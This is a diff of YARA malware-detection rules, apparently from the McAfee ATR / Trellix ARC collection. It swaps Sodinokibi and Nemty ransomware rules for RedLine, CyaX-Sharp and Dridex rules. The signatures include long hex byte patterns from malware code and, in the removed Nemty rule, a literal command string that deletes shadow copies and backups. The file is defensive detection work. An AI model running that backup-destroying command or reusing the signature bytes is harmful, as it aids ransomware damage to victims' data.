-		$7 = {0D46503D4DFD825DED41C94C055E1FCE1134C6F63AD80DCD7427F4BD502FA186077BD22653AB098C96ECDDA26557FB82BBA053CB2067C9DEA7EE0AF6A44C468A}
-		$8 = {2E774F2038FDE77277253CD11BFEB6FB82CB6A03E1B34E134C78A2CFDC1B5CD63AD167EE4E78A227FEF694EE3269143D1B0E84CF7CDAE5C3035C263DD15B979B}
-		$9 = {5C4250510A8DEF3463BF7410DEE0E72759B8A94A4D0544BD9B4FC0846E61844F4E06B779ABF906A450F5A2AC4C57CF761798C539175F092FD2429DC27909E382}
-		$10 = {7C787B386177B4D7F1F6B9E6FE17154FF15BD9E3F1DA94A1E1064654E7500A0B86A20A4AA16BD4E16F19A8733960DE868F10F382CDEEC1F15CE718839241DA10}
-		$11 = {2C3C6F6B2E597AC746FF7664087C7E899ABCC27AC60FA545D9CF4323063896D299F57132FE3E63E567EBFADF296365A1B2C0163DD8A4F3DABA04C77FA39A99CB}
-		$12 = {7B3C5D7C73D34D1A6C66B91990D162CACD89ECEAF591AC56C95AB3151EBAC1687FB749924B7BC27917FE50CA6C1417FEDBCC5BA2B7C03B1AEE4F5732E69DAC14}
-		$13 = {406357775C42584F11A1610D3A8A31F094FA252BC3E10738BD310D536D3A2F9EC5C21996AC4DCF5237AE3A4467D5678EE2983E4282ADFB1FDEA16352109BA7A7}
-		$14 = {2F265663680CACC66731B11AA78D588D7B54AC06C6348905D6B8F52C608D8208B0C6C5F1C11A2F69608D363DFA2A365AA387DAFCC906B486548F3DA8FE36312E}
-		$15 = {2B37480D634C799C468B775404368C7B891ADE3A556DF888566EB8CB3ED6F0171B59C35BB57F3B75D9017B7C9D52D1E87F48795AA58A16695B98BAFEAF66A769}
-		$16 = {0A76372D4F488ED5649A19B42E9E42B1DCC2E62655E7041711A6235B825D791CD6519492309D46964594F78B1DCAD17A5BEA574166B8A8EB76A52CA1052D724A}
-		$17 = {3D0B635F789C6CA6ADAC549548AA509C99D0C8DD823C99704423B90175B062E70EBBA67F937D622FF41B59D21E763A26D36759F3297D12B7454D82676C5B7B4A}
-		$18 = {225B642B7A09E7B06A4D3B95D97927AC46DABAE3ECE93AA4B307259DB9C01361C905B240678DB830EB7E172EB939ECB188ED3504B3709A746772B7BC94C83FB6}
-		$19 = {27465E49761EECAF449A3AB147907CF1C3D5F161D353E236BF9940AEC099EA4AC0352576803626029A15B3E978AB84D0024A1E345FFE58A81CDA2FBD61408971}
-		$20 = {3B7431210BEE4762B447DF044B5D6F41D53824C3E2CD17A35D71029352B47DA3811C60458EAADEBA532F75C54A3DDFC74AB3BEA7A51AF81A4A688F5D7A10378C}
-		$21 = {276C41453F8F2D8279980EAD3328E2478A3D84C55EB668231A12EED150E496622FCB2C04D9CBCE257BD97B9ECE404037589A185573F936A78DA88AD43EFC3948}
-		$22 = {2727495F5B1B4D920E35A52B6A5DB6A7F8B31A26873E20C53388696567D692B4B1F4A0B9267E4BBDA1728A5E883FD69029A07669AC1D0DC22E3157C028705C19}
-		$23 = {3E5552672C26C4F22824AF196F222D370F9EEDBEF119B8C3DD96414CF3529912234CB08AA7B2A034A51635319EAC44D47FA68747BA4B2FD2A884373ADEFB5C84}
-		$24 = {20735E632C6C70375BCA935EE39B7FA508205E9CC034CBD193A0D1C1E3A9A13818B9EB7FEFB11891E71221DB7143286C7D36A91C1FF7615E38F02E5C1BA24AFF}
-		$25 = {0A3D69344860D944AA8A46908019AB085E025AA693D381A34D8DCF116B25B0C62355D93893D1F64B983986C7E956C22303A9AB109680BF4B74460C5B087412AF}
-		$26 = {7C5B79652BC66C9BC36B11730D556FFA1CA1616CA59C0C344FD1F6B50C9C259329D699CDF0B894F1540AFDC4F431957206B0748AB6AE3B9069CD91147E09709B}
-		$27 = {2257442B42DB79A5E6CAD745E9A8D9775E4216C95F6094A05F05D7DAADBB03EC4B3444983DD291C2E32FC39299BCB4D22219386E75DAABB8D2EA93DFC52A248B}
-		$28 = {3C0D4A68792594D2F23F10A465B38B75D272318CA0E532A8A183F8CE5DEE6B45ECFDC96E4FF9158832472ED8CDFA69F92868A503F821D848CBB97B58332D8F84}
+		$a = { 4883EC28E847000000488D0DF0FFFFFF488D1539000000482BCA4803C14883C428C3CCCC488D05D5FFFFFF482BC8488BC1C3CCCC4883EC28E83F0D000033C04883C428C3CCCCCCCCCCCCCCCCCCCCCCCCE8000000005848B95510004001000000482BC148B950100040010000004803C1C3CCCCCC48897C24084C8BC94D85C0740C488BF9480FBEC2498BC8F3AA488B7C2408498BC1C3CCCC40534883EC20488BD9E85AFFFFFF488D0D53FFFFFF482BD94803C34883C4205BC3CCCCCC33D28BC2EB06FFC04883C10266391175F5F3C3CC668339004C8BC1740B4983C002664183380075F54C2BC20FB70266418904104883C2026685C075EF488BC1C34C8BC14C2BC20FB70266418904104883C2026685C075EF488BC1C3CC4C8BC14C2BC28A024188041048FFC284C075F3488BC1C3CC8039004C8BC1740949FFC04180380075F74C2BC28A024188041048FFC284C075F3488BC1C3CCCCCC48895C24084533D2458BCA4585C07E320FB702663901741A0FB719440FB7D88BC3412BC383F8207409442BDB4183FB20751041FFC14883C1024883C202453BC87CCE488B5C2408453BC8410F95C2418BC2C3CCCC4533C948895108458BC16644390A740D41FFC04963C06644390C4275F3664503C066448901664183C0026644894102C34883EC3833C04C8BD233D248895424228954242A668954242E66894424204885C9741A4D85D27415488BD1488D4C2420E89BFFFFFF488D4C242041FFD24883C438C3CCCC4883EC284863C14C8BCA4C8D44243833D233C94869C0F0D8FFFF488944243841FFD14883C428C3CC48895C241048897C241855488BEC4883EC604883651000488365C800488365D800488365E000488365F000488365F800498BD9498BF848894DC0488BC24C8D4DC04C8D45D0488D4D10BAFFFF1F00C745D030000000C745E840020000FFD0488B4D104885C9740DBA01000000FFD7488B4D10FFD34C8D5C2460498B5B18498B7B20498BE35DC3CCCC488BC44889580848896810565741544883EC308360D80083601800498BF18BEA4C8BE1498BD833FF4C8D4818488D50D88D4F054533C0FFD3894424208B44246085C0750733C0E9C20000008D14004533C033C9FFD6448B4424604C8D4C2460488BD0B9050000004503C0488BF0FFD38944242085C0740B33D2488BCEFF542470EBC28B4C246048B81986611886611886488BDE48F7E1482BCA48D1E94803CA48C1E908894C2460488B4B404885C9742E0FB743383BC57C262BC5992BC2D1F84C63C8781A8BC54A8D0C49992BC2498BD4D1F8448BC0E8AEFDFFFF85C0740B393B740B8B034803D8EBBE488B7B50488B4424784885C0740A4885FF7405488918EB0933D2488BCEFF542470488BC7488B5C2450488B6C24584883C430415C5F5EC3C20000CC4585C07410482BCA8A0288041148FFC241FFC875F3F3C3CC40534883EC20488BD9E8E6FBFFFF488D0DDFFBFFFF482BD94803C34883C4205BC3CCCCCC48895C2408488974241048897C24185541544155488BEC4883EC404863413C4C8BC1B90B020000488BF2C745E04D6D4765C745E474537973C745E874656D52C745EC6F757469C745F06E654164C745F46472657366C745F873006642394C00180F8584000000428B8400880000004533D24903C08B50208B58248B781C448B68184903D04903D84903F84585ED745B8B024533C94903C044380874234C8D5DE0488BC84C2BD8458A240B4584E47410443821750B48FFC149FFC180390075E741803C0100750842807C0DE000740E41FFC24883C204453BD57310EBB3420FB70C538B048F4903C0488906488B1E4885DB750883C8FFE9E1020000488D0D47340000E8D6FEFFFF488BD3488BC8E89BFCFFFF488D0D5034000048898690000000E8B8FEFFFF488B16488BC8E87DFCFFFF488D0D5A34000048898698000000E89AFEFFFF488B16488BC8E85FFCFFFF488D0D6C34000048894608E87FFEFFFF488B16488BC8E844FCFFFF488D0D8934000048894610E864FEFFFF488B16488BC8E829FCFFFF488D0D9E34000048894618E849FEFFFF488B16488BC8E80EFCFFFF488D0DAB34000048894620E82EFEFFFF488B16488BC8E8F3FBFFFF488D0DC834000048894628E813FEFFFF488B16488BC8E8D8FBFFFF488D0DE534000048894630E8F8FDFFFF488B16488BC8E8BDFBFFFF488D0D0235000048894638E8DDFDFFFF488B16488BC8E8A2FBFFFF488D0DF734000048894640E8C2FDFFFF488B16488BC8E887FBFFFF488D0DFC34000048894648E8A7FDFFFF488B16488BC8E86CFBFFFF488D0D0935000048894650E88CFDFFFF488B16488BC8E851FBFFFF488D0D0E35000048894658E871FDFFFF488BC8488B16E836FBFFFF488D0D2B35000048894660E856FDFFFF488B16488BC8E81BFBFFFF488D0D5035000048894668E83BFDFFFF488B16488BC8E800FBFFFF488D0D5D35000048894670E820FDFFFF488B16488BC8E8E5FAFFFF488D0D7235000048894678E805FDFFFF488B16488BC8E8CAFAFFFF488D0D8735000048898680000000E8E7FCFFFF488B16488BC8E8ACFAFFFF488D0D8935000048898688000000E8C9FCFFFF488B16488BC8E88EFAFFFF488D0D8B350000488986A0000000E8ABFCFFFF488B16488BC8E870FAFFFF488D0D95350000488986A8000000E88DFCFFFF488B16488BC8E852FAFFFF488D0DA7350000488986B0000000E86FFCFFFF488B16488BC8E834FAFFFF488D0DA1350000488986B8000000E851FCFFFF488B16488BC8E816FAFFFF488D0DA3350000488986C0000000E833FCFFFF488B16488BC8E8F8F9FFFF488D0DA5350000488986C8000000E815FCFFFF488B16488BC8E8DAF9FFFF488986D000000033C0488B5C2460488B742468488B7C24704883C440415D415C5DC348895C24085556574154415541564157488DAC2410FEFFFF4881ECF00200004533FF488BD9498BF8488BF2488D8DE100000041B80301000033D24C897C24504C897C24604C897C24704C897C24684C89BD480200004488BDE0000000E8EFF7FFFF488D4DC0C745C01C010000FF9688000000837DC40675488B45C885C0752780BDDA00000001754D83C8FF488B9C24300300004881C4F0020000415F415E415D415C5F5E5DC383F801742A83F802740583F80375D380BDDA000000017517EBC8837DC40A75C244397DC875BC80BDDA0000000175B3488BD7488BCBFF56384C393F74A541BD300000004C897C243041BE000000084C8D8D380200004C8D442478488D4C2460418D55DEBB00020000448974242848C785380200004729000044896C24784C897D80895D904C897D884C897D984C897DA0C744242040000000FF96900000004C397C24607509418D45CEE937FFFFFF895D90BB040000004C897C24304C8D8D380200004C8D442478488D4C24708D530241BC1F4C1000448974242844896C24784C897D804C897D884C89A5380200004C897D984C897DA0895C2420FF9690000000488B0F4C8D7708498BD64C8975B0FF5678488B4C2460C74424484000000044897C2440C744243802000000488D44245048894424304C8D85480200004533C94883CAFF4C897C242848C744242000200000FF9698000000488B4C2470895C244844897C2440C744243802000000488D44245048894424304C8D4424684533C94883CAFF4C897C24284C897C24504C89642420 }
+		$b = { E800000000582D051040000500104000C3558BEC8B45082D001040005DC20400558BECFF7508E80A0A000033C05DC20400558BEC8B4D1085C9741F0FB6450C69C0010101018BD153578B7D08C1E902F3AB8BCA83E103F3AA5F5B8B45085DC3558BECE899FFFFFF8B4D0881E90010400003C15DC20400558BEC8B4D0833C066390174084066833C410075F85DC20400558BEC8B450866833800568BF0740983C60266833E0075F78B4D0C2BF10FB7116689140E83C1026685D275F15E5DC20800558BEC8B55088B450C2BD00FB70866890C0283C0026685C975F18B45085DC20800558BEC8B55088B450C2BD08A08880C024084C975F68B45085DC20800558BEC8B4508803800568BF0740646803E0075FA8B4D0C2BF18A1188140E4184D275F65E5DC20800558BEC5633F63975107E2D8B45088B4D0C0FB704700FB70C71663BC174148BD08BC18BCA2BC883F92074072BC283F8207506463B75107CD333C03B75105E0F95C05DC20C00558BEC8B450C8B550850894204E8FAFEFFFF03C066890283C002668942025DC20800558BEC51515733C0668945F88D7DFAAB33C966AB5F394D08741A394D0C7415FF75088D45F850E8B3FFFFFF8D45F850FF550C8BC88BC1C9C20800558BEC51518B45086AFF9968F0D8FFFF5250E8730A00008945F88D45F8506A006A008955FCFF550CC9C20800558BEC83EC248B4508568945F48D45F4508D45DC5033F668FFFF1F008D45FC508975FC8975F8C745DC180000008975E0C745E8400200008975E48975EC8975F0FF550C3975FC5E740E6A01FF75FCFF5510FF75FCFF5514C9C21000558BEC83EC0C538D45FC5033DB538D45F8506A05895DF8895DFCFF55108945F88B45FC3BC3750733C0E99E000000565303C05053FF55148BF08D45FC508B45FC03C050566A05897514FF55108945F83BC374095356FF551833C0EB6F8B45FC33D2B9F8000000F7F1578945FC8B7E3C3BFB742E0FB746383B450C7C252B450C992BC28BC8D1F978198B450C992BC2D1F850FF75088D044F50E83BFEFFFF85C0740A8B063BC3740903F0EBC18B7E44EB028BFB8B451C3BC374083BFB74048930EB0753FF7514FF55188BC75F5E5BC9C21800C21400558BEC837D100074178B4D088B450C2BC88A10FF4D1088140140837D100075F15DC20C00558BECE8B3FCFFFF8B4D0881E90010400003C15DC20400558BEC83EC2C538B5D088B433CB90B010000568B750CC745D44D6D4765C745D874537973C745DC74656D52C745E06F757469C745E46E654164C745E86472657366C745EC730066394C18180F858F0000008B44187803C38B501C8B482003D3578B78248B40188955F033D203CB03FB8955FC8945F485C07466EB038B5D088B149183650C0003D3803A0074238D5DD42BDA8BC2895DF8EB038B5DF88A1C0384DB740D38187509FF450C4080380075E98B450C803C10007507807C05D400740E8B55FC428955FC3B55F472B0EB128B45FC0FB704478B4DF08B048103450889065F8B0685C0750883C8FFE9230200005068D0414000E8F0FEFFFF50E831FDFFFFFF3689464868F0414000E8DBFEFFFF50E81CFDFFFFFF3689464C6818424000E8C6FEFFFF50E807FDFFFFFF368946046844424000E8B1FEFFFF50E8F2FCFFFFFF368946086878424000E89CFEFFFF50E8DDFCFFFFFF3689460C68A8424000E887FEFFFF50E8C8FCFFFFFF3689461068CC424000E872FEFFFF50E8B3FCFFFFFF368946146800434000E85DFEFFFF50E89EFCFFFFFF368946186834434000E848FEFFFF50E889FCFFFFFF3689461C686C434000E833FEFFFF50E874FCFFFFFF36894620687C434000E81EFEFFFF50E85FFCFFFFFF36894624689C434000E809FEFFFF50E84AFCFFFFFF3689462868C0434000E8F4FDFFFF50E835FCFFFFFF3689462C68DC434000E8DFFDFFFF50E820FCFFFFFF368946306810444000E8CAFDFFFF50E80BFCFFFFFF36894634684C444000E8B5FDFFFF50E8F6FBFFFFFF368946386874444000E8A0FDFFFF50E8E1FBFFFFFF3689463C68A0444000E88BFDFFFF50E8CCFBFFFFFF3689464068D0444000E876FDFFFF50E8B7FBFFFFFF3689464468EC444000E861FDFFFF50E8A2FBFFFFFF368946506808454000E84CFDFFFF50E88DFBFFFFFF368946546830454000E837FDFFFF50E878FBFFFFFF36894658685C454000E822FDFFFF50E863FBFFFFFF3689465C6870454000E80DFDFFFF50E84EFBFFFFFF368946606890454000E8F8FCFFFF50E839FBFFFFFF3689466468AC454000E8E3FCFFFF50E824FBFFFF89466833C05E5BC9C20800558BEC81EC5C020000535633DB5768030100008D85A5FDFFFF5350895DF8895DE8895DDC895DF4895DFC889DA4FDFFFFE889F9FFFF8B7D0C83C40C8D85A8FEFFFF50C785A8FEFFFF1C010000FF574483BDACFEFFFF05751283BDB0FEFFFF02743983BDB0FEFFFF01EB2E83BDACFEFFFF06750E399DB0FEFFFF7510807DC201751983C8FF5F5E5BC9C20C0083BDB0FEFFFF0175ED807DC20175E78B751056FF7508FF571C391E74D95368000000086A408D45EC508D45C4506A0E8D45E850C745EC47250000895DF0C745C418000000895DC8C745D000020000895DCC895DD4895DD8FF5748395DE875056AFE58EB955368000000086A048D45EC508D45C4506A068D45DCBE0B4C1000508975EC895DF0C745C418000000895DC8C745D000020000895DCC895DD4895DD8FF57488B45108D480451FF30894DE0FF573C6A40536A028D45F850536800200000538D45FC506AFFFF75E8FF574C6A04536A028D45F8505356538D45F4506AFFFF75DC895DF88975EC895DF0FF574C395DFC0F84330200008B75F43BF30F8428020000895E048B85B4FEFFFF8946108B85ACFEFFFF8946088B85B0FEFFFF89460C6A0C5889462C8946308B4510C7060C3C1000C7462830000000C746342C000000C7463818000000C7463CA80100008B401C894618895D0C6840464000E800F8FFFF8BC88B450C8A0C0180F10D888C05A4FDFFFF4089450C3D040100007CD98D8DA4FDFFFF8D46405150E855F8FFFF6844474000E8C9F7FFFF508D464050E85DF8FFFF8B45108B40283BC3742C8B4E1883F902750A8B40200504020000EB0D83F90375158B40200500010000508D860001000050E80BF8FFFFE825F7FFFFB9881C400081E90010400003C189450C33C9EB038B450C8A04088B55FC88040A4181F94825000072EB535353680C3C100056FF572C8BF03BF37460536A0156FF57386A1053536A015356FF57348B75108946203BC37447C680040200004E8B4620C68005020000538B4620C680060200002E8B4620C68007020000658B4620C68008020000788B4620C68009020000658B462088980A020000EB038B75108B46243BC30F8497000000895D083958040F868B000000895D0C8B46248B4D0C8B8401DC0000008D4D105150895D10FF5714395D107455FF7510FF57683B06754B536A3053FF57048945E43BC3743DE833F6FFFF53B91E13400081E90010400003C18B4DFC6A0183C12051535053FF7510FF75E4FF57245353FF75F4FF75E4FF5728FF770C6A01E8C1F7FFFFFF45088B46248B4D0883450C403B48040F8278FFFFFFFF75E0FF574033C0E9CFFCFFFFFF75E0FF57406AFDE92AFDFFFF558BEC81EC0C020000565733F66A688D8540FFFFFF565089B53CFFFFFFE8DAF5FFFF83C40C6A0A5933C06A0A8975A88D7DACF3AB5989B510FFFFFF8DBD14FFFFFFF3AB8D45A8898538FFFFFF8D853CFFFFFF50FF7508C745C401000000C7852CFFFFFF02000000E8BBF8FFFF85C00F8582010000538D85F4FDFFFF50C785F4FDFFFF1C010000FF5580BBEC45400083BDF8FDFFFF05750353EB0568D0454000E86CF8FFFF8D4DCC51FFB54CFFFFFFFFB540FFFFFFFFB544FFFFFF6A1850E856F7FFFFFFB548FFFFFF8BF83BFE750C68D0070000E8B9F6FFFFEBB46888130000E8ADF6FFFF8D45A8508D853CFFFFFF5057E849FBFFFF85C00F85F8000000EB10FFB548FFFFFF68D0070000E882F6FFFF8B45C883781C0175E783BDF8FDFFFF05750E6808464000E8E5F7FFFF6A16EB0C68D0454000E8D7F7FFFF6A18598D9534FFFFFF52FFB54CFFFFFFFFB540FFFFFFFFB544FFFFFF5150E8BCF6FFFF }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		filesize < 1KB and any of them
 }
-
-rule TRELLIX_ARC_Ransomware_Sodinokibi : RANSOMWARE FILE
+rule TRELLIX_ARC_Redline_Payload : BACKDOOR FILE
 {
 	meta:
-		description = "Using a recently disclosed vulnerability in Oracle WebLogic, criminals use it to install a new variant of ransomware called “Sodinokibi"
-		author = "Christiaan Beek | McAfee ATR team"
-		id = "573e3390-1ee5-5489-a67e-decc02aea7a0"
-		date = "2019-05-13"
-		modified = "2025-03-18"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Sodinokibi.yar#L3-L30"
+		description = "Rule to detect the RedLine payload"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "61c2032f-1e6b-5123-8f99-ff83ae95e8a9"
+		date = "2020-04-16"
+		modified = "2020-08-14"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_redline.yar#L1-L38"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "cb5d4e9a7cbec27d693ed73bab4be598614d7bd5ebd23d7907730571a4174be8"
+		hash = "5df956f08d6ad0559efcdb7b7a59b2f3b95dee9e2aa6b76602c46e2aba855eff"
+		logic_hash = "44df161b7434b9137ca5bb919eb314f8447b216b3f6e1214606a898fb36ee4f4"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Sodinokibi"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/RedLine"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash4 = "9b62f917afa1c1a61e3be0978c8692dac797dd67ce0e5fd2305cc7c6b5fef392"
 
 	strings:
-		$x1 = "sodinokibi.exe" fullword wide
-		$y0 = { 8d 85 6c ff ff ff 50 53 50 e8 62 82 00 00 83 c4 }
-		$y1 = { e8 24 ea ff ff ff 75 08 8b ce e8 61 fc ff ff 8b }
-		$y2 = { e8 01 64 ff ff ff b6 b0 }
+		$s1 = "Cambrel.exe" fullword ascii
+		$s2 = { 22 00 54 00 65 00 78 00 74 00 49 00 6e 00 70 00 75 00 74 00 46 00 72 00 61 00 6d 00 65 00 77 00 6f 00 72 00 6b 00 2e 00 44 00 59 00 4e 00 4c 00 49 00 4e 00 4b 00 22 00 }
+		$op0 = { 06 7c 34 00 00 04 7b 17 00 00 04 7e 21 00 00 0a }
+		$op1 = { 96 00 92 0e 83 02 02 00 f4 20 }
+		$op2 = { 03 00 c6 01 d9 08 1b 03 44 }
+		$p0 = { 80 00 96 20 83 11 b7 02 10 }
+		$p1 = { 20 01 00 72 0f 00 20 02 00 8a 0f 00 20 03 00 61 }
+		$p2 = { 03 00 c6 01 cd 06 13 03 79 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and pe.imphash ( ) == "672b84df309666b9d7d2bc8cc058e4c2" and all of ( $y* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of ( $s* ) and all of ( $op* ) or all of ( $p* )
 }
-rule TRELLIX_ARC_Sodinokobi : RANSOMWARE
+rule TRELLIX_ARC_Cyaxsharp_Rezer0 : LOADER
 {
 	meta:
-		description = "This rule detect Sodinokobi Ransomware in memory in old samples and perhaps future."
-		author = "McAfee ATR team"
-		id = "dd05ce31-9699-50a9-944c-5883340791af"
-		date = "2025-06-01"
-		modified = "2025-03-18"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Sodinokibi.yar#L32-L53"
+		description = "Detects CyaX-Sharp/ReZer0 loader samples based on the embedded scheduled task template"
+		author = "Max 'Libra' Kersten for McAfee's Advanced Threat Research Team"
+		id = "7a1addcf-4e8f-5290-8788-9b0738128160"
+		date = "2021-04-08"
+		modified = "2021-08-04"
+		reference = "This rule was published in combination with the following McAfee ATR blog: https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/see-ya-sharp-a-loaders-tale/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MAL_cyax_sharp_loader.yar#L1-L16"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "f25039ac743223756461bbeeb349c674473608f9959bf3c79ce4a7587fde3ab2"
+		logic_hash = "3d6daaf7a85a9b3898e4ce5d5293b09f26965f9f7280b34ba8f6814b7f14dec2"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Sodinokibi"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		tags = "LOADER"
 		version = "1.0"
+		malware_type = "loader"
 
 	strings:
-		$a = { 40 0F B6 C8 89 4D FC 8A 94 0D FC FE FF FF 0F B6 C2 03 C6 0F B6 F0 8A 84 35 FC FE FF FF 88 84 0D FC FE FF FF 88 94 35 FC FE FF FF 0F B6 8C 0D FC FE FF FF }
-		$b = { 0F B6 C2 03 C8 8B 45 14 0F B6 C9 8A 8C 0D FC FE FF FF 32 0C 07 88 08 40 89 45 14 8B 45 FC 83 EB 01 75 AA }
+		$template = { 01A10C3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3136223F3E0D0A3C5461736B2076657273696F6E3D22312E322220786D6C6E733D22687474703A2F2F736368656D61732E6D6963726F736F66742E636F6D2F77696E646F77732F323030342F30322F6D69742F7461736B223E0D0A20203C526567697374726174696F6E496E666F3E0D0A202020203C446174653E323031342D31302D32355431343A32373A34342E383932393032373C2F446174653E0D0A202020203C417574686F723E5B5553455249445D3C2F417574686F723E0D0A20203C2F526567697374726174696F6E496E666F3E0D0A20203C54726967676572733E0D0A202020203C4C6F676F6E547269676765723E0D0A2020202020203C456E61626C65643E747275653C2F456E61626C65643E0D0A2020202020203C5573657249643E5B5553455249445D3C2F5573657249643E0D0A202020203C2F4C6F676F6E547269676765723E0D0A202020203C526567697374726174696F6E547269676765723E0D0A2020202020203C456E61626C65643E66616C73653C2F456E61626C65643E0D0A202020203C2F526567697374726174696F6E547269676765723E0D0A20203C2F54726967676572733E0D0A20203C5072696E636970616C733E0D0A202020203C5072696E636970616C2069643D22417574686F72223E0D0A2020202020203C5573657249643E5B5553455249445D3C2F5573657249643E0D0A2020202020203C4C6F676F6E547970653E496E746572616374697665546F6B656E3C2F4C6F676F6E547970653E0D0A2020202020203C52756E4C6576656C3E4C6561737450726976696C6567653C2F52756E4C6576656C3E0D0A202020203C2F5072696E636970616C3E0D0A20203C2F5072696E636970616C733E0D0A20203C53657474696E67733E0D0A202020203C4D756C7469706C65496E7374616E636573506F6C6963793E53746F704578697374696E673C2F4D756C7469706C65496E7374616E636573506F6C6963793E0D0A202020203C446973616C6C6F77537461727449664F6E4261747465726965733E66616C73653C2F446973616C6C6F77537461727449664F6E4261747465726965733E0D0A202020203C53746F704966476F696E674F6E4261747465726965733E747275653C2F53746F704966476F696E674F6E4261747465726965733E0D0A202020203C416C6C6F77486172645465726D696E6174653E66616C73653C2F416C6C6F77486172645465726D696E6174653E0D0A202020203C53746172745768656E417661696C61626C653E747275653C2F53746172745768656E417661696C61626C653E0D0A202020203C52756E4F6E6C7949664E6574776F726B417661696C61626C653E66616C73653C2F52756E4F6E6C7949664E6574776F726B417661696C61626C653E0D0A202020203C49646C6553657474696E67733E0D0A2020202020203C53746F704F6E49646C65456E643E747275653C2F53746F704F6E49646C65456E643E0D0A2020202020203C526573746172744F6E49646C653E66616C73653C2F526573746172744F6E49646C653E0D0A202020203C2F49646C6553657474696E67733E0D0A202020203C416C6C6F7753746172744F6E44656D616E643E747275653C2F416C6C6F7753746172744F6E44656D616E643E0D0A202020203C456E61626C65643E747275653C2F456E61626C65643E0D0A202020203C48696464656E3E66616C73653C2F48696464656E3E0D0A202020203C52756E4F6E6C79496649646C653E66616C73653C2F52756E4F6E6C79496649646C653E0D0A202020203C57616B65546F52756E3E66616C73653C2F57616B65546F52756E3E0D0A202020203C457865637574696F6E54696D654C696D69743E505430533C2F457865637574696F6E54696D654C696D69743E0D0A202020203C5072696F726974793E373C2F5072696F726974793E0D0A20203C2F53657474696E67733E0D0A20203C416374696F6E7320436F6E746578743D22417574686F72223E0D0A202020203C457865633E0D0A2020202020203C436F6D6D616E643E5B4C4F434154494F4E5D3C2F436F6D6D616E643E0D0A202020203C2F457865633E0D0A20203C2F416374696F6E733E0D0A3C2F5461736B3E }
 
 	condition:
-		all of them
+		$template
 }
-rule TRELLIX_ARC_Nemty_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Dridex_P2P_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Nemty Ransomware"
+		description = "Rule to detect Dridex P2P based on the PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "e9b133d6-fd77-5201-995d-c42bae7cde46"
-		date = "2020-02-23"
+		id = "57350c96-877e-57de-9465-df9f7eb6d656"
+		date = "2014-11-29"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Nemty.yar#L1-L45"
+		reference = "https://www.us-cert.gov/ncas/alerts/aa19-339a"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_dridex_p2p_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "73bf76533eb0bcc4afb5c72dcb8e7306471ae971212d05d0ff272f171b94b2d4"
-		logic_hash = "d055286670516318c14dcf4e5873b96eede5e1dfb3ee978553fc11f1ac6b3252"
+		hash = "5345a9405212f3b8ef565d5d793e407ae8db964865a85c97e096295ba3f39a78"
+		logic_hash = "c9c4db48435203cdb882eef8082efd8424bd13f1aa512cfb3082f365b9bc6e83"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Nemty"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Dridex"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$x1 = "/c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default}" fullword ascii
-		$s2 = "https://pbs.twimg.com/media/Dn4vwaRW0AY-tUu.jpg:large :D" fullword ascii
-		$s3 = "MSDOS.SYS" fullword wide
-		$s4 = "/c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} " ascii
-		$s5 = "recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete" fullword ascii
-		$s6 = "DECRYPT.txt" fullword ascii
-		$s7 = "pv3mi+NQplLqkkJpTNmji/M6mL4NGe5IHsRFJirV6HSyx8mC8goskf5lXH2d57vh52iqhhEc5maLcSrIKbukcnmUwym+In1OnvHp070=" fullword ascii
-		$s8 = "\\NEMTY-DECRYPT.txt\"" fullword ascii
